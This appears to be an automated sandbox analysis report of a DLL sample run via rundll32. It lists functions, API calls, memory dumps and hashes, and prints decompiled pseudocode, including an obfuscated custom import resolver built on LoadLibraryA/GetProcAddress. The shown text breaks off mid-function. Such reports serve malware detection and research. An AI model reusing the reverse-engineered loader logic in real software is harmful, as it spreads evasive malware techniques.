    • Opcode ID: 274a007612baa40644cd4d9e739c9b08f7f46fb18afb9c60d9376b0d28e57f02
    • Instruction ID: 5ebc70a673eb80c28e15da06f1dee0750bf19152bc34c7005694386a1b1c4f66
    • Opcode Fuzzy Hash: 274a007612baa40644cd4d9e739c9b08f7f46fb18afb9c60d9376b0d28e57f02
    • Instruction Fuzzy Hash: D991073090425AAEDF1DCE69C450AFEBBB1EF42364F10CA46E875DBA91D3309552CB63
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D5374E6, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
    Download Yara Rule
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID: C:\Windows\SYSTEM32\loaddll32.exe
    • API String ID: 0-1872383224
    • Opcode ID: 0629795bf0f8e611826e44314d894c35ce618a105aa761d68bf0047e6e029be4
    • Instruction ID: 6a72655316f092c6fee162ecfc7533d483d24761977493ec83f12830eb8a5dd0
    • Opcode Fuzzy Hash: 0629795bf0f8e611826e44314d894c35ce618a105aa761d68bf0047e6e029be4
    • Instruction Fuzzy Hash: DD41A571E04365EBDF1ACB99CC80A9EBBF8EF86310F124466E515D7A40FB709A01CB91
    Uniqueness

    Uniqueness Score: -1.00%

    Analysis Process: rundll32.exe PID: 6652 Parent PID: 6632 rundll32.exeCOMMON

    Executed Functions

    Function 6D52A958, Relevance: 7.6, APIs: 5, Instructions: 87COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: dllmain_raw$dllmain_crt_dispatch
    • String ID:
    • API String ID: 3136044242-0
    • Opcode ID: b3654e4926da37d0847fd49d11c7922a5328385dbf5a26a18d57d14d9c1dda13
    • Instruction ID: 320ebb8cc9b7f9ae688d4b65ec6c1f1d1e2a28de22e9a359cfa2196ae796c12e
    • Opcode Fuzzy Hash: b3654e4926da37d0847fd49d11c7922a5328385dbf5a26a18d57d14d9c1dda13
    • Instruction Fuzzy Hash: 44219172D0461AAFCB298E25CD40E7F3A79EFC4BA4F024515F82557A90C7308D498FE0
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D543710, Relevance: 6.1, APIs: 4, Instructions: 69COMMON
    Download Yara Rule
    APIs
    • GetLastError.KERNEL32(?,?,?,6D5438E3,6D545DB9,?,?,6D538848,?,?,?,6D52E166,?,?,?,6D529FF1), ref: 6D543715
    • _free.LIBCMT ref: 6D543772
    • _free.LIBCMT ref: 6D5437A8
    • SetLastError.KERNEL32(00000000,6D5740F0,000000FF,?,?,?,6D5438E3,6D545DB9,?,?,6D538848,?,?,?,6D52E166,?), ref: 6D5437B3
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: ErrorLast_free
    • String ID:
    • API String ID: 2283115069-0
    • Opcode ID: 80cb68f256889b7b40a577ffe03923c7e2993bb9c901a8643982f842fbc1c904
    • Instruction ID: 59156dc9f7c67239fb659d1db27d62b33c44edd4795a70a4d8155a6afb0b6ed0
    • Opcode Fuzzy Hash: 80cb68f256889b7b40a577ffe03923c7e2993bb9c901a8643982f842fbc1c904
    • Instruction Fuzzy Hash: 7311E0B514810266FB0946759C85F2A2569BBC637BF23C638F36886DF0EF214E044553
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D52A7A1, Relevance: 4.6, APIs: 3, Instructions: 76COMMON
    Download Yara Rule
    APIs
    • __RTC_Initialize.LIBCMT ref: 6D52A7EE
      • Part of subcall function 6D52B40D: RtlInitializeSListHead.NTDLL(6D588DD0), ref: 6D52B412
    • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6D52A858
    • ___scrt_fastfail.LIBCMT ref: 6D52A8A2
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: Initialize$HeadList___scrt_fastfail___scrt_is_nonwritable_in_current_image
    • String ID:
    • API String ID: 2097537958-0
    • Opcode ID: dc8fd1917554c780ca088498fe6b52c48a349d5dc6d6fe407874b01c88e725ca
    • Instruction ID: 9c8ae21e878c3c0282fbb5e741d260dd475e9d98cd92f08348496be605965202
    • Opcode Fuzzy Hash: dc8fd1917554c780ca088498fe6b52c48a349d5dc6d6fe407874b01c88e725ca
    • Instruction Fuzzy Hash: 2721273254C2129EDF1D7BB49804FAC3B729F8226DF124816D680B7DC2DB32484EC6A6
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D545D30, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
    Download Yara Rule
    APIs
    • RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 6D545D71
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: 665d7b99aae0023b07a8382b130f00d4dc4c2877de3ca0bd8439ec3edc3baabd
    • Instruction ID: e9374abefb1ccb153a20242b3a8ebceb6198635ec6c7f30bf1487769857007c1
    • Opcode Fuzzy Hash: 665d7b99aae0023b07a8382b130f00d4dc4c2877de3ca0bd8439ec3edc3baabd
    • Instruction Fuzzy Hash: 1BF0E93164457567EF1E5A76CC0CB7B3798AF82770B12C922E814DBC94DB20EA0586E3
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    Function 6D54F1CF, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON
    Download Yara Rule
    APIs
    • GetLocaleInfoW.KERNEL32(?,2000000B,6D54F4ED,00000002,00000000,?,?,?,6D54F4ED,?,00000000), ref: 6D54F268
    • GetLocaleInfoW.KERNEL32(?,20001004,6D54F4ED,00000002,00000000,?,?,?,6D54F4ED,?,00000000), ref: 6D54F291
    • GetACP.KERNEL32(?,?,6D54F4ED,?,00000000), ref: 6D54F2A6
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: InfoLocale
    • String ID: ACP$OCP
    • API String ID: 2299586839-711371036
    • Opcode ID: 1b23e779680c22bce25c562be7c8f9160bbcb67ef42a9147fe2f01f709d2d44f
    • Instruction ID: ac97e00777d40908981faea32fca04b60d1a0b2c34faa57eaf7e2482a40eb842
    • Opcode Fuzzy Hash: 1b23e779680c22bce25c562be7c8f9160bbcb67ef42a9147fe2f01f709d2d44f
    • Instruction Fuzzy Hash: E521A43AA4C102A6E75DCF5CCE01A9B73B6BB85B54B52CD24E905C7900E732DD40C762
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D54EA25, Relevance: 7.8, APIs: 5, Instructions: 251COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 6D5435B9: GetLastError.KERNEL32(?,?,?,6D550F08,?,00000001,6D54A405,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,?), ref: 6D5435BE
      • Part of subcall function 6D5435B9: SetLastError.KERNEL32(00000000,6D5740F0,000000FF,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,?,?,6D572358,0000002C,6D54A405), ref: 6D54365C
    • GetACP.KERNEL32(?,?,?,?,?,?,6D544733,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 6D54EAE6
    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6D544733,?,?,?,00000055,?,-00000050,?,?), ref: 6D54EB11
    • _wcschr.LIBVCRUNTIME ref: 6D54EBA5
    • _wcschr.LIBVCRUNTIME ref: 6D54EBB3
    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6D54EC74
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
    • String ID:
    • API String ID: 4147378913-0
    • Opcode ID: d4dce55865838ccdc4576b08ddc6ec48ec902a7c57d6bee3f15b6c7afcd9e0fd
    • Instruction ID: d78fea38672865cb5b77d662cfdd72af5e1de1b1ab1a210d5fb313ed846aef42
    • Opcode Fuzzy Hash: d4dce55865838ccdc4576b08ddc6ec48ec902a7c57d6bee3f15b6c7afcd9e0fd
    • Instruction Fuzzy Hash: BB713B71644203AAE71EDB75CD49FB773A8FF85304F11C86AEA05D7980EB70E94187A2
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D54F3A4, Relevance: 7.7, APIs: 5, Instructions: 183COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 6D5435B9: GetLastError.KERNEL32(?,?,?,6D550F08,?,00000001,6D54A405,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,?), ref: 6D5435BE
      • Part of subcall function 6D5435B9: SetLastError.KERNEL32(00000000,6D5740F0,000000FF,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,?,?,6D572358,0000002C,6D54A405), ref: 6D54365C
      • Part of subcall function 6D5435B9: _free.LIBCMT ref: 6D54361B
      • Part of subcall function 6D5435B9: _free.LIBCMT ref: 6D543651
    • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 6D54F4B0
    • IsValidCodePage.KERNEL32(00000000), ref: 6D54F4F9
    • IsValidLocale.KERNEL32(?,00000001), ref: 6D54F508
    • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 6D54F550
    • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 6D54F56F
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
    • String ID:
    • API String ID: 949163717-0
    • Opcode ID: 0342d1bd0088ea01e71d3b5c6ade30597ffe17d61c3e8a48bdfcfd21e39eb471
    • Instruction ID: 10b3acbe3ac6cbad06cc1ab24985ce8530a03155b276faebcad073cae3c52fba
    • Opcode Fuzzy Hash: 0342d1bd0088ea01e71d3b5c6ade30597ffe17d61c3e8a48bdfcfd21e39eb471
    • Instruction Fuzzy Hash: 7A515671A00206AFEF09DFA8CC44BBF77B8FF45704F158869E614E7590EB7099448B62
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D502485, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 195nativeCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E6D502485(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x6d5041f8;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x6d504240 = 1;
										__eflags =  *0x6d504240;
										if( *0x6d504240 != 0) {
											goto L60;
										}
										_t84 =  *0x6d5041f8;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x6d504240 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x6d5041f8 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x6d504200 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x6d5041fc + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x6d504200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6d504200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x6d504240 = 1;
							__eflags =  *0x6d504240;
							if( *0x6d504240 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x6d504200 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x6d504200 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x6d504240 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x6d504200 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x6d5041f8 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x6d504200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6d504200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































    0x6d50248f
    0x6d502492
    0x6d502498
    0x6d5024b6
    0x00000000
    0x6d5024b6
    0x6d5024a0
    0x6d5024a9
    0x6d5024af
    0x6d5024be
    0x6d5024c1
    0x6d5024c4
    0x6d5024ce
    0x6d5024ce
    0x6d5024d0
    0x6d5024d3
    0x6d5024d5
    0x6d5024d5
    0x6d5024d7
    0x6d5024da
    0x00000000
    0x00000000
    0x6d5024dc
    0x6d5024de
    0x6d502544
    0x6d502544
    0x6d5026a2
    0x00000000
    0x6d5026a2
    0x6d5024e0
    0x6d5024e0
    0x6d5024e4
    0x6d5024e6
    0x6d5024e6
    0x6d5024e6
    0x6d5024e6
    0x6d5024e9
    0x6d5024ea
    0x6d5024ed
    0x6d5024ed
    0x6d5024f1
    0x6d5024f5
    0x6d502503
    0x6d502503
    0x6d50250b
    0x6d502511
    0x6d502513
    0x6d502515
    0x6d502525
    0x6d502532
    0x6d502536
    0x6d50253b
    0x6d50253d
    0x6d5025bb
    0x6d5025bb
    0x6d50253f
    0x6d50253f
    0x6d50253f
    0x6d5025bd
    0x6d5025bf
    0x6d5026a0
    0x6d5026a0
    0x00000000
    0x6d5025c5
    0x6d5025c5
    0x6d5025cc
    0x00000000
    0x00000000
    0x6d5025d2
    0x6d5025d6
    0x6d502632
    0x6d502634
    0x6d50263c
    0x6d50263e
    0x6d502640
    0x00000000
    0x00000000
    0x6d502642
    0x6d502648
    0x6d50264a
    0x6d50264c
    0x6d502661
    0x6d502661
    0x6d502663
    0x6d502692
    0x6d502699
    0x00000000
    0x6d502699
    0x6d502667
    0x6d502668
    0x6d50266a
    0x6d50266c
    0x6d50266c
    0x6d50266e
    0x6d502670
    0x6d502672
    0x6d502686
    0x6d502686
    0x6d502689
    0x6d50268b
    0x6d50268b
    0x6d50268c
    0x6d50268c
    0x00000000
    0x6d502674
    0x6d502674
    0x6d502674
    0x6d50267d
    0x6d50267e
    0x6d502680
    0x6d502682
    0x6d502682
    0x00000000
    0x6d502674
    0x6d502672
    0x6d50264e
    0x6d502655
    0x6d502655
    0x6d502657
    0x00000000
    0x00000000
    0x6d502659
    0x6d50265a
    0x6d50265d
    0x6d50265f
    0x00000000
    0x00000000
    0x00000000
    0x6d50265f
    0x00000000
    0x6d502655
    0x6d5025d8
    0x6d5025db
    0x6d5025e0
    0x00000000
    0x00000000
    0x6d5025e9
    0x6d5025eb
    0x6d5025f1
    0x00000000
    0x00000000
    0x6d5025f7
    0x6d5025fd
    0x00000000
    0x00000000
    0x6d502603
    0x6d502605
    0x6d50260e
    0x6d502612
    0x00000000
    0x00000000
    0x6d502618
    0x6d50261b
    0x6d50261d
    0x00000000
    0x00000000
    0x6d502624
    0x6d502626
    0x00000000
    0x00000000
    0x6d502628
    0x6d50262c
    0x00000000
    0x00000000
    0x00000000
    0x6d50262c
    0x00000000
    0x00000000
    0x00000000
    0x6d502517
    0x6d502517
    0x6d502517
    0x6d50251e
    0x00000000
    0x00000000
    0x6d502520
    0x6d502521
    0x6d502523
    0x00000000
    0x00000000
    0x00000000
    0x6d502523
    0x6d50254b
    0x6d50254d
    0x00000000
    0x00000000
    0x6d50255d
    0x6d50255f
    0x6d502561
    0x00000000
    0x00000000
    0x6d502567
    0x6d50256e
    0x6d50259a
    0x6d50259a
    0x6d50259c
    0x6d50259e
    0x6d5025b2
    0x6d5025b4
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6d5025a0
    0x6d5025a0
    0x6d5025a0
    0x6d5025a9
    0x6d5025aa
    0x6d5025ac
    0x6d5025ae
    0x6d5025ae
    0x00000000
    0x6d5025a0
    0x6d502570
    0x6d502573
    0x6d502575
    0x6d502587
    0x6d502587
    0x6d50258a
    0x6d50258c
    0x6d50258c
    0x6d50258d
    0x6d50258d
    0x6d502593
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6d502577
    0x6d502577
    0x6d502577
    0x6d50257e
    0x00000000
    0x00000000
    0x6d502580
    0x6d502580
    0x6d502581
    0x00000000
    0x00000000
    0x00000000
    0x6d502581
    0x6d502583
    0x6d502585
    0x6d502598
    0x00000000
    0x00000000
    0x00000000
    0x6d502598
    0x00000000
    0x6d502585
    0x6d5024f7
    0x6d5024fa
    0x6d5024fd
    0x00000000
    0x00000000
    0x6d5024ff
    0x6d502501
    0x00000000
    0x00000000
    0x00000000
    0x6d502501
    0x6d5024c6
    0x6d5024c8
    0x00000000
    0x00000000
    0x00000000
    0x00000000

    APIs
    • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6D502536
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.979678689.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000003.00000002.979661998.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.979687462.000000006D503000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.979694688.000000006D505000.00000004.00020000.sdmp Download File
    • Associated: 00000003.00000002.979710009.000000006D506000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: MemoryQueryVirtual
    • String ID: @BPm$@BPm$@BPm
    • API String ID: 2850889275-3677909773
    • Opcode ID: cbed2fd852487a29f10cfd2b393f1944733b3a9ad1c0e1aa1ff911b1823990be
    • Instruction ID: 8f8d27e2bf6710e8673cee77fdf6f32c98b434d462c3da90cf8dc5b8bc2dfff8
    • Opcode Fuzzy Hash: cbed2fd852487a29f10cfd2b393f1944733b3a9ad1c0e1aa1ff911b1823990be
    • Instruction Fuzzy Hash: 2061C9307046039FDB3DCE28D4A076973B5FB9A318F258869D926CBE90EB31D842CA54
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D50146C, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E6D50146C() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;

				_t8 =  *0x6d5041b0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x6d5041bc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 <= 5) {
					_t4 = 0x32;
					return _t4;
				} else {
					 *0x6d5041ac = _t3;
					_t5 = GetCurrentProcessId();
					 *0x6d5041a8 = _t5;
					 *0x6d5041b0 = _t8;
					_t6 = OpenProcess(0x10047a, 0, _t5);
					 *0x6d5041a4 = _t6;
					if(_t6 == 0) {
						 *0x6d5041a4 =  *0x6d5041a4 | 0xffffffff;
					}
					return 0;
				}
			}









    0x6d50146d
    0x6d50147b
    0x6d501483
    0x6d501488
    0x6d5014d2
    0x6d5014d2
    0x6d50148a
    0x6d501492
    0x6d5014ce
    0x6d5014d0
    0x6d501494
    0x6d501494
    0x6d501499
    0x6d5014a7
    0x6d5014ac
    0x6d5014b2
    0x6d5014ba
    0x6d5014bf
    0x6d5014c1
    0x6d5014c1
    0x6d5014cb
    0x6d5014cb

    APIs
    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6D5017B8,73B763F0,00000000), ref: 6D50147B
    • GetVersion.KERNEL32 ref: 6D50148A
    • GetCurrentProcessId.KERNEL32 ref: 6D501499
    • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6D5014B2
    Memory Dump Source
    • Source File: 00000003.00000002.979678689.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000003.00000002.979661998.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.979687462.000000006D503000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.979694688.000000006D505000.00000004.00020000.sdmp Download File
    • Associated: 00000003.00000002.979710009.000000006D506000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Process$CreateCurrentEventOpenVersion
    • String ID:
    • API String ID: 845504543-0
    • Opcode ID: d24ac0b9b1123bea2e23bc1123370a0271dbfaddc020d12d5d9ce5fecf18ea8a
    • Instruction ID: e6b53a10f53e76775d0eda7c37c0f8d80a93b3bef8181569658e77aae2356492
    • Opcode Fuzzy Hash: d24ac0b9b1123bea2e23bc1123370a0271dbfaddc020d12d5d9ce5fecf18ea8a
    • Instruction Fuzzy Hash: 03F09A30645311AFFF409F68AC19F823BB0B72EB12F12841EF145C98C0D3B040408B84
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D501F31, Relevance: 3.1, APIs: 2, Instructions: 92libraryloaderCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E6D501F31(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x6d5041cc;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71);
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x63699bc3;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x63699b44;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x63699bc3;
										}
										 *_v16 = _t55;
										_t58 = 0x725990f8 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x9c9664bb;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
